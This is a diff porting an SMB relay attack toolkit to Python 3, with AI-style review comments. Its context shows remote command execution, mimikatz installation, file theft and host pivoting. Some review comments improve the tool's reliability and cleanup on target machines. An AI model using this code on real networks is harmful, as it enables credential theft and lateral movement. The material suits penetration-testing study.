@@ -1841,11 +1841,11 @@ def GetAfFile(data, s, File, Host): data,s,f = SMBOpenFile(File, "C", Host, READ, data, s) data,s,Output = GrabAndRead(f, File, data, s) WriteOutputToFile(Output, Host+"-"+File) - print "[+] Done." + print ("[+] Done.") return ModifySMBRetCode(data) ##Command was successful, ret true. except: - print "[+] Get file failed. Remote filename was typed correctly?" + print ("[+] Get file failed. Remote filename was typed correctly?") return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong. ##########UploadAFile############# @@ -1857,7 +1857,7 @@ def WriteFile(data, s, File, FileSize, FileContent, Host): return ModifySMBRetCode(data) ##Command was successful, ret true. except: - print "[+] Write failed." + print ("[+] Write failed.") return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong. ##########DeleteAFile############ @@ -1868,7 +1868,7 @@ def DeleteFile(data, s, File, Host): data,s = CloseTID(data, s) return ModifySMBRetCode(data) ##Command was successful, ret true. except: - print "[+] Delete operation failed.\n[+] Something went wrong." + print ("[+] Delete operation failed.\n[+] Something went wrong.") data,s = CloseTID(data, s) return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong. @@ -1890,7 +1890,7 @@ def RunCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, RunPath, Fi time.sleep(1) data,s,f = SMBOpenFile(LogFile, "C", Host, RW, data, s) data,s,Output = ReadAndDelete(f, LogFile, data, s) - print Output + print (Output) data = DeleteFile(data, s, "\\Windows\\Temp\\"+FileName, Host) Logs.info('Command executed:') 
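Review bot: GetAfFile prints `[+] Done.` regardless of whether the file was opened: SMBOpenFile returns the sentinel `f = "A"` on access denied precisely so the caller does not throw, but the `f` is passed straight into `GrabAndRead(f, File, data, s)` and the function then reports success and writes an output file. Check the sentinel first — `if f == "A": return ModifySMBRetCode(data)` — before reading and before announcing Done; ReadFile above has the same shape. How GrabAndRead treats an `f` of "A" is outside my view.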
@@ -1900,7 +1900,7 @@ def RunCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, RunPath, Fi except: #Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works. - print "[+] Something went wrong, try something else." + print ("[+] Something went wrong, try something else.") return ModifySMBRetCode(data) ##########Runas############# @@ -1922,7 +1922,7 @@ def RunAsCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, FileName) time.sleep(1) data,s,f = SMBOpenFile( LogFile, "C", Host, RW, data, s) data,s,Output = ReadAndDelete(f, LogFile, data, s) - print Output + print (Output) data = DeleteFile(data, s, "\\Windows\\Temp\\"+FileName, Host) Logs.info('Command executed:') @@ -1932,7 +1932,7 @@ def RunAsCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, FileName) except: data = DeleteFile(data, s, "\\Windows\\Temp\\"+FileName, Host) #Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works. - print "[+] Something went wrong, try something else." + print ("[+] Something went wrong, try something else.") return ModifySMBRetCode(data) ##########MimiKatz RPC############# @@ -1961,7 +1961,7 @@ def InstallMimiKatz(data, s, clientIP, Username, Domain, Command, Logs, Host, Fi except: #Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works. - print "[+] Something went wrong, try something else." + print ("[+] Something went wrong, try something else.") return ModifySMBRetCode(data) def RunMimiCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, FileName): 
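Review bot: RunCmd's `except` in the first hunk prints `[+] Something went wrong, try something else.` and returns without removing the dropped `\Windows\Temp\<FileName>`, whereas RunAsCmd's except in the same run of hunks first does `data = DeleteFile(data, s, "\\Windows\\Temp\\"+FileName, Host)`. A failed command therefore leaves the uploaded binary on the target; add the same DeleteFile call to RunCmd's except, and to InstallMimiKatz's which has the same shape. Both functions start before their hunks, so the upload itself is not visible here and this is inferred from the cleanup that follows the happy path.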
@@ -1990,7 +1990,7 @@ def RunMimiCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, FileNam return ModifySMBRetCode(data) except: #Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works. - print "[+] Something went wrong while calling mimikatz. Maybe it's a 32bits system? Try mimi32." + print ("[+] Something went wrong while calling mimikatz. Maybe it's a 32bits system? Try mimi32.") return ModifySMBRetCode(data) ##########Pivot############# @@ -2017,7 +2017,7 @@ def PivotToOtherHost(data, s, clientIP, Username, Domain, Logs, Host, RunAsPath, except: #Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works. - print "[+] Something went wrong, try something else." + print ("[+] Something went wrong, try something else.") return ModifySMBRetCode(data) ##########VerifyPivot############# @@ -2049,7 +2049,7 @@ def VerifyPivot(data, s, clientIP, Username, Domain, Pivot, Logs, Host, RunAsPat except: #Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works. - print "[+] Something went wrong, try something else." + print ("[+] Something went wrong, try something else.") return ModifySMBRetCode(data) ##########DoSomethingDumb############# diff --git a/tools/MultiRelay/RelayMultiPackets.py b/tools/MultiRelay/RelayMultiPackets.py index bba63a3..8f8c876 100644 --- a/tools/MultiRelay/RelayMultiPackets.py +++ b/tools/MultiRelay/RelayMultiPackets.py 
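Review bot: The bare `except:` in RunMimiCmd turns every failure into `Something went wrong while calling mimikatz. Maybe it's a 32bits system? Try mimi32.`, and PivotToOtherHost and VerifyPivot use the same catch-all; on this Python 3 port the far more likely cause is a TypeError from mixing bytes and str, which the operator will never see. Catch `except Exception as e:` and append the exception text, e.g. `print ("[+] Something went wrong while calling mimikatz (%s). Maybe it's a 32bits system? Try mimi32." % e)`. A bare `except` also swallows KeyboardInterrupt, so Ctrl-C during a hung RPC call is reported as a mimikatz failure. Each function starts before its hunk.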
@@ -388,20 +388,20 @@ class SMBSessionSetupAndxAUTH(Packet): SecurityBlobLen = str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderTagLenOfLen"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLenOfLen"])+str(self.fields["AsnSecMechLen"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagLenOfLen"])+str(self.fields["ChoosedTagLen"])+str(self.fields["ChoosedTag1"])+str(self.fields["ChoosedTag1StrLenOfLen"])+str(self.fields["ChoosedTag1StrLen"])+str(self.fields["Data"]) NTLMData = str(self.fields["Data"]) - ###### ASN Stuff + ###### ASN Stuff if len(NTLMData) > 255: - self.fields["ApplicationHeaderTagLenOfLen"] = "\x82" - self.fields["ApplicationHeaderLen"] = struct.pack(">H", len(SecurityBlobLen)-0) + self.fields["ApplicationHeaderTagLenOfLen"] = "\x82" + self.fields["ApplicationHeaderLen"] = struct.pack(">H", len(SecurityBlobLen)-0) else: self.fields["ApplicationHeaderTagLenOfLen"] = "\x81" - self.fields["ApplicationHeaderLen"] = struct.pack(">B", len(SecurityBlobLen)-3) + self.fields["ApplicationHeaderLen"] = struct.pack(">B", len(SecurityBlobLen)-3) if len(NTLMData)-8 > 255: self.fields["AsnSecMechLenOfLen"] = "\x82" - self.fields["AsnSecMechLen"] = struct.pack(">H", len(SecurityBlobLen)-4) + self.fields["AsnSecMechLen"] = struct.pack(">H", len(SecurityBlobLen)-4) else: self.fields["AsnSecMechLenOfLen"] = "\x81" - self.fields["AsnSecMechLen"] = struct.pack(">B", len(SecurityBlobLen)-6) + self.fields["AsnSecMechLen"] = struct.pack(">B", len(SecurityBlobLen)-6) if len(NTLMData)-12 > 255: self.fields["ChoosedTagLenOfLen"] = "\x82" diff --git a/tools/SMBFinger/Finger.py b/tools/SMBFinger/Finger.py index 682b0c1..729095c 100755 --- a/tools/SMBFinger/Finger.py +++ b/tools/SMBFinger/Finger.py 
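Review bot: On Python 3 the ASN.1 length arithmetic in this hunk is wrong: `self.fields["ApplicationHeaderLen"] = struct.pack(">H", ...)` stores bytes while `"\x82"` / `"\x81"` store str, and `SecurityBlobLen` is assembled with `str(self.fields[...])` — `str(b'\x00\x12')` is the repr `"b'\\x00\\x12'"`, thirteen characters, not two bytes — so the header lengths are computed from the wrong total and the SPNEGO blob will not parse on the target. The tag bytes need to be bytes literals (`b"\x82"`) and the concatenation should be `b"".join(...)` of bytes fields rather than `str()`. The commit only re-indents these lines; the method begins before the hunk.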
@@ -126,7 +126,7 @@ class SMBNegoDataLanMan(Packet): ##################### def color(txt, code = 1, modifier = 0): - return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt) + return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt) def IsSigningEnabled(data): if data[39] == "\x0f": 
@@ -141,27 +141,27 @@ def dtoa(d): return inet_ntoa(struct.pack("!L", d)) def OsNameClientVersion(data): - try: - length = struct.unpack(' 255: - OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[48+length:].split('\x00\x00\x00')[:2]]) - return OsVersion, ClientVersion + OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[48+length:].split('\x00\x00\x00')[:2]]) + return OsVersion, ClientVersion if length <= 255: - OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[47+length:].split('\x00\x00\x00')[:2]]) - return OsVersion, ClientVersion - except: - return "Could not fingerprint Os version.", "Could not fingerprint LanManager Client version" + OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[47+length:].split('\x00\x00\x00')[:2]]) + return OsVersion, ClientVersion + except: + return "Could not fingerprint Os version.", "Could not fingerprint LanManager Client version" def GetHostnameAndDomainName(data): - try: - DomainJoined, Hostname = tuple([e.replace('\x00','') for e in data[81:].split('\x00\x00\x00')[:2]]) + try: + DomainJoined, Hostname = tuple([e.replace('\x00','') for e in data[81:].split('\x00\x00\x00')[:2]]) #If max length domain name, there won't be a \x00\x00\x00 delineator to split on - if Hostname == '': - DomainJoined = data[81:110].replace('\x00','') - Hostname = data[113:].replace('\x00','') - return Hostname, DomainJoined - except: - return "Could not get Hostname.", "Could not get Domain joined" + if Hostname == '': + DomainJoined = data[81:110].replace('\x00','') + Hostname = data[113:].replace('\x00','') + return Hostname, DomainJoined + except: + return "Could not get Hostname.", "Could not get Domain joined" def DomainGrab(Host): s = socket(AF_INET, SOCK_STREAM) 
@@ -169,7 +169,7 @@ def DomainGrab(Host): s.settimeout(Timeout) s.connect(Host) except: - print "Host down or port close, skipping" + print ("Host down or port close, skipping") pass try: h = SMBHeaderLanMan(cmd="\x72",mid="\x01\x00",flag1="\x00", flag2="\x00\x00") @@ -191,7 +191,7 @@ def SmbFinger(Host): s.settimeout(Timeout) s.connect(Host) except: - print "Host down or port close, skipping" + print ("Host down or port close, skipping") pass try: h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x53\xc8") @@ -252,10 +252,10 @@ def ShowResults(Host): Signing, OsVer, LanManClient = SmbFinger(Host) enabled = color("SMB signing is mandatory. Choose another target", 1, 1) disabled = color("SMB signing: False", 2, 1) - print color("Retrieving information for %s..."%Host[0], 8, 1) - print enabled if Signing else disabled - print color("Os version: '%s'"%(OsVer), 8, 3) - print color("Hostname: '%s'\nPart of the '%s' domain"%(Hostname, DomainJoined), 8, 3) + print (color("Retrieving information for %s..."%Host[0], 8, 1)) + print (enabled if Signing else disabled) + print (color("Os version: '%s'"%(OsVer), 8, 3)) + print (color("Hostname: '%s'\nPart of the '%s' domain"%(Hostname, DomainJoined), 8, 3)) except: pass @@ -288,7 +288,7 @@ def ShowScanSmallResults(Host): Hostname, DomainJoined = DomainGrab(Host) Signing, OsVer, LanManClient = SmbFinger(Host) Message ="['%s', Os:'%s', Domain:'%s', Signing:'%s']"%(Host[0], OsVer, DomainJoined, Signing) - print Message + print (Message) except: pass @@ -299,13 +299,13 @@ def ShowSigning(Host): s.settimeout(Timeout) s.connect((Host, 445)) except: - print "[Pivot Verification Failed]: Target host is down" + print ("[Pivot Verification Failed]: Target host is down" ) return True try: Signing = SmbFingerSigning(Host) if Signing == True: - print "[Pivot Verification Failed]:Signing is enabled. Choose another host." + print ("[Pivot Verification Failed]:Signing is enabled. Choose another host.") return True else: return False
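Review bot: When the connect fails, DomainGrab's `except:` prints `Host down or port close, skipping` and then `pass`es, so execution continues into the next `try:` and sends on a socket that never connected; that failure is swallowed by the following bare except, and whatever the function returns for a down host is outside my view. Return from the except instead of `pass` so a down host is really skipped, and do the same in SmbFinger in the next hunk, which has the identical pattern.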
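Review bot: ShowSigning is the pivot safety check, and the signing detection it depends on compares a received byte with a str (`if data[39] == "\x0f":` in IsSigningEnabled, visible as context earlier in this file); on Python 3 `data[39]` is an int, so that test is always False and a host that enforces signing can be reported as `Signing: False`, letting the relay pivot to a target where it will fail. The comparison should be `data[39] == 0x0f` (or `data[39:40] == b"\x0f"`), and ShowSigning should treat an unparseable response as unsafe rather than fall through to `return False`. SmbFingerSigning itself is outside the hunk, so this is inferred from its sibling; the stray space in `"...is down" )` is cosmetic.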